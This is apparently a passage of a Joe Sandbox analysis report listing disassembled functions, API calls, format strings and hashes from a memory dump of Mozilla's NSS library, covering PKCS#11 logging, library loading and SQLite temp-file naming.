PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
PR_GetCurrentThread.NSS3 ref: 6C880A70
PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
EnterCriticalSection.KERNEL32(?), ref: 6C880B19
OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
OutputDebugStringA.KERNEL32(?), ref: 6C880B88
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C36
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C45
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
_PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
PR_LogFlush.NSS3 ref: 6C880C7E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E
_PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
free.MOZGLUE(00000000), ref: 6C880D99

Strings

%ld[%p]: , xrefs: 6C880A96
%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - , xrefs: 6C880A5B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputStringfflush$Timefwrite$Unothrow_t@std@@@__ehfuncinfo$??2@$R_snprintfSystem$CriticalCurrentEnterExplodeFileFlushR_vsmprintfR_vsnprintfSectionThreadfputcfreememcpy
String ID: %04d-%02d-%02d %02d:%02d:%02d.%06d UTC - $%ld[%p]:
API String ID: 3820836880-2800039365
Opcode ID: c2f21f9e19942bf777c364ece1831c6999ba8d66007411776299c7d23b63f52f
Instruction ID: 1dda754c166852db230c2f9096c04ab32c68be7b0daf413437093380ba0ab3e1
Opcode Fuzzy Hash: c2f21f9e19942bf777c364ece1831c6999ba8d66007411776299c7d23b63f52f
Instruction Fuzzy Hash: 0CA1F771A061549FDF309F68DD88B9A3B78AF1231CF080A78F81593B42D775AA94CBD1

Function 6C7A8BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 202COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKeyPair), ref: 6C7A8BC6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8BF4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8C03

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8C19
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A8C3F
PR_LogPrint.NSS3( pPublicKeyTemplate = 0x%p,?), ref: 6C7A8C5A
PR_LogPrint.NSS3( ulPublicKeyAttributeCount = %d,?), ref: 6C7A8C73
PR_LogPrint.NSS3( pPrivateKeyTemplate = 0x%p,?), ref: 6C7A8C8C
PR_LogPrint.NSS3( ulPrivateKeyAttributeCount = %d,?), ref: 6C7A8CA7
PR_LogPrint.NSS3( phPublicKey = 0x%p,?), ref: 6C7A8CC2
PR_LogPrint.NSS3( phPrivateKey = 0x%p,?), ref: 6C7A8CE7
PL_strncpyz.NSS3(?, *phPublicKey = 0x%x,00000050), ref: 6C7A8D92
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8DA1
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8DB7
PL_strncpyz.NSS3(?, *phPrivateKey = 0x%x,00000050), ref: 6C7A8DEB
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8DFA

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8E10

Strings

phPublicKey = 0x%p, xrefs: 6C7A8CBD
pPublicKeyTemplate = 0x%p, xrefs: 6C7A8C55
ulPublicKeyAttributeCount = %d, xrefs: 6C7A8C6E
phPrivateKey = 0x%p, xrefs: 6C7A8CE2
pPrivateKeyTemplate = 0x%p, xrefs: 6C7A8C87
(CK_INVALID_HANDLE), xrefs: 6C7A8BFC, 6C7A8D9A, 6C7A8DF3
C_GenerateKeyPair, xrefs: 6C7A8BC1
*phPublicKey = 0x%x, xrefs: 6C7A8D7C, 6C7A8D8C
ulPrivateKeyAttributeCount = %d, xrefs: 6C7A8CA2
pMechanism = 0x%p, xrefs: 6C7A8C3A
*phPrivateKey = 0x%x, xrefs: 6C7A8DD5, 6C7A8DE5
hSession = 0x%x, xrefs: 6C7A8BDE, 6C7A8BEE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn$ModulePageSize
String ID: *phPrivateKey = 0x%x$ *phPublicKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pPrivateKeyTemplate = 0x%p$ pPublicKeyTemplate = 0x%p$ phPrivateKey = 0x%p$ phPublicKey = 0x%p$ ulPrivateKeyAttributeCount = %d$ ulPublicKeyAttributeCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKeyPair
API String ID: 510426473-985563836
Opcode ID: b1d4d615bd078dc91e4bc459b17c94bfb9f72a0016171c3de487100f16425fb1
Instruction ID: 6aa59b4b14d72c884e5ee2ae9faa130402a743aa0c7229b94684896168033460
Opcode Fuzzy Hash: b1d4d615bd078dc91e4bc459b17c94bfb9f72a0016171c3de487100f16425fb1
Instruction Fuzzy Hash: 0261D371602154FBDB208F94DF4CE9A7BB1AB4621DF048876E80867B12D734BC0ACBA1

Function 6C7A28A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C7A28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C7A28EF

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A28D6

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C7A2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C7A2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C7A29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C7A29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C7A2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C7A2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C7A2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C7A2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C7A2AB6

Strings

firmware version: %d.%d, xrefs: 6C7A2AB1
serial = "%.16s", xrefs: 6C7A29BE
manufacturerID = "%.32s", xrefs: 6C7A297E
label = "%.32s", xrefs: 6C7A295E
CKF_LOGIN_REQUIRED, xrefs: 6C7A29F3, 6C7A2A1E
maxRwSessions = %u, RwSessions = %u, xrefs: 6C7A2A61
CKF_RNG, xrefs: 6C7A2A13, 6C7A2A20
model = "%.16s", xrefs: 6C7A299E
pInfo = 0x%p, xrefs: 6C7A28EA
C_GetTokenInfo, xrefs: 6C7A28B8
CKF_WRITE_PROTECTED, xrefs: 6C7A29FE, 6C7A2A1F
slotID = 0x%x, xrefs: 6C7A28D1
CKF_USER_PIN_INIT, xrefs: 6C7A29E5
hardware version: %d.%d, xrefs: 6C7A2A89
flags = %s %s %s %s, xrefs: 6C7A2A21
maxSessions = %u, Sessions = %u, xrefs: 6C7A2A43

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: 2e2aa851fd786b4951ce56ab6fd50c66d20fbbf116e2b7353d714bb1ffd35ede
Instruction ID: fb56bd3099422ea05546d323fdb7af572f131e1ad8ab1a02c167df84be63c3ed
Opcode Fuzzy Hash: 2e2aa851fd786b4951ce56ab6fd50c66d20fbbf116e2b7353d714bb1ffd35ede
Instruction Fuzzy Hash: B351E5B1202144AFEB308B95CF8DB6577A5AB4521DF4984B5EC089BB13DB31FC09CBA1

Function 6C786BF0 Relevance: 49.1, APIs: 19, Strings: 9, Instructions: 148COMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(6C8C0148,?,?,?,?,6C786DC2), ref: 6C786BFF
PR_smprintf.NSS3(%s manufacturerID='%s',00000000,?,6C786DC2), ref: 6C786C1C

Part of subcall function 6C75C5E0: free.MOZGLUE(?,?,?,?,00000000,00000001,?,6C761FBD,Unable to create nspr log file '%s',00000000), ref: 6C75C63B

free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786C27
PR_smprintf.NSS3(%s libraryDescription='%s',00000000,?,6C786DC2), ref: 6C786C45
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786C50
PR_smprintf.NSS3(%s cryptoTokenDescription='%s',00000000,?,6C786DC2), ref: 6C786C71
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786C7C
PR_smprintf.NSS3(%s dbTokenDescription='%s',00000000,?,6C786DC2), ref: 6C786C9D
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786CA8
PR_smprintf.NSS3(%s cryptoSlotDescription='%s',00000000,?,6C786DC2), ref: 6C786CC9
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786CD4
PR_smprintf.NSS3(%s dbSlotDescription='%s',00000000,?,6C786DC2), ref: 6C786CF5
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786D00
PR_smprintf.NSS3(%s FIPSSlotDescription='%s',00000000,?,6C786DC2), ref: 6C786D1D
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786D28
PR_smprintf.NSS3(%s FIPSTokenDescription='%s',00000000,?,6C786DC2), ref: 6C786D45
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786D50
PR_smprintf.NSS3(%s minPS=%d,00000000,?,6C786DC2), ref: 6C786D68
free.MOZGLUE(00000000,?,?,?,6C786DC2), ref: 6C786D73

Strings

%s manufacturerID='%s', xrefs: 6C786C17
%s dbSlotDescription='%s', xrefs: 6C786CF0
%s cryptoTokenDescription='%s', xrefs: 6C786C6C
%s cryptoSlotDescription='%s', xrefs: 6C786CC4
%s libraryDescription='%s', xrefs: 6C786C40
%s dbTokenDescription='%s', xrefs: 6C786C98
%s FIPSSlotDescription='%s', xrefs: 6C786D18
%s FIPSTokenDescription='%s', xrefs: 6C786D40
%s minPS=%d, xrefs: 6C786D63

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: R_smprintffree
String ID: %s FIPSSlotDescription='%s'$%s FIPSTokenDescription='%s'$%s cryptoSlotDescription='%s'$%s cryptoTokenDescription='%s'$%s dbSlotDescription='%s'$%s dbTokenDescription='%s'$%s libraryDescription='%s'$%s manufacturerID='%s'$%s minPS=%d
API String ID: 657075589-3414793728
Opcode ID: 1d2b51883a5df6c0869de5b65bfe20d06e28384ec2e967b72021430b7e85d613
Instruction ID: ae40011390aba9956fbf29f943bb2a1a98776cddedf91eaa668ad865aa6353d1
Opcode Fuzzy Hash: 1d2b51883a5df6c0869de5b65bfe20d06e28384ec2e967b72021430b7e85d613
Instruction Fuzzy Hash: 7B4104F66034113BAB206A651E0EDA73A58DEC15DCB280574FD1DD7B05FA22CB25C2F6

Function 6C760AA0 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 227libraryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C760AD4

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3 ref: 6C760B0D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C760B2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 6C760B54
WideCharToMultiByte.KERNEL32 ref: 6C760B94
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C760BC9
calloc.MOZGLUE(00000001,00000014), ref: 6C760BEA
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 6C760C15

Strings

error %d, xrefs: 6C760D08
Loaded library %s (load lib), xrefs: 6C760D6F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$EnterErrorLibraryLoadMonitorValuecalloc
String ID: Loaded library %s (load lib)$error %d
API String ID: 2139286163-2368894446
Opcode ID: b5096a14b3e7c90edb7ffff7c3a975624380df555aa5a01ba65ba21ad4e0968f
Instruction ID: 470577fc4a67927599fb14188ad20c718e91e59f69753857b6cbdd6a013ae6eb
Opcode Fuzzy Hash: b5096a14b3e7c90edb7ffff7c3a975624380df555aa5a01ba65ba21ad4e0968f
Instruction Fuzzy Hash: B471D5B0A002509BEB209F2ADE49AAA77B8EF4535CF044179EC09D6A41EB309E44CB95

Function 6C7ACB70 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6C7C444C,00000000,00000000,00000000,?,6C787F7C,6C7880DD), ref: 6C7ACB8B

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C8BDEB5,?,6C7C444C,00000000,00000000,00000000,?,6C787F7C,6C7880DD), ref: 6C7ACB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6C7C444C,00000000,00000000,00000000,?,6C787F7C,6C7880DD), ref: 6C7ACBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6C7C444C,00000000,00000000,00000000), ref: 6C7ACBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7C444C,00000000,00000000,00000000), ref: 6C7ACC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7C444C,00000000,00000000), ref: 6C7ACCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C7ACD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C7C444C,00000000), ref: 6C7ACDA6
PR_IntervalToMilliseconds.NSS3(LD|l,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7C444C), ref: 6C7ACE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7ACE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6C7ACE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7ACE72

Strings

Avg., xrefs: 6C7ACBBE
NSS_OUTPUT_FILE, xrefs: 6C7ACB86
%25s %10d %10d%2s, xrefs: 6C7ACE33
Totals, xrefs: 6C7ACE2E
Maximum number of concurrent open sessions: %d, xrefs: 6C7ACE4A
% Time, xrefs: 6C7ACBB9
# Calls, xrefs: 6C7ACBC8
%-25s %10d %10d%2s , xrefs: 6C7ACCD3
LD|l, xrefs: 6C7ACDAE, 6C7ACE01, 6C7ACE1D
%-25s %10s %12s %12s %10s, xrefs: 6C7ACBD2
Function, xrefs: 6C7ACBCD

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$LD|l$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-2013755990
Opcode ID: 0ed19080c62d1fea30d41cd29eaf4a9506a96ceb54a638e061508ce56400fd64
Instruction ID: 02473d6910af70c2cb0aae8819f10e3519e93e74e8588f01fbce53c98d9969c1
Opcode Fuzzy Hash: 0ed19080c62d1fea30d41cd29eaf4a9506a96ceb54a638e061508ce56400fd64
Instruction Fuzzy Hash: 3D71AB72E041406BC721B7FD4F0AA5EB678AF96309F544B36E90576F01FB32584687E2

Function 6C846E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C70BE66), ref: 6C846E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C70BE66), ref: 6C846E98
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,?,?,?,?,?,?,6C70BE66), ref: 6C846EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C70BE66), ref: 6C846ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C846EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C70BE66), ref: 6C846FA6
sqlite3_snprintf.NSS3(?,00000000,6C8AAAF9,00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C846FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847014
sqlite3_free.NSS3(00000000,?,?,?,?,6C70BE66), ref: 6C84701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C70BE66), ref: 6C847030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C70BE66), ref: 6C84705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C70BE66), ref: 6C847079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C70BE66), ref: 6C847097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C70BE66), ref: 6C8470A0

Strings

mz_etilqs_, xrefs: 6C846F18
winGetTempname5, xrefs: 6C847071
winGetTempname2, xrefs: 6C8470C4
winGetTempname4, xrefs: 6C847046
winGetTempname1, xrefs: 6C84708F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
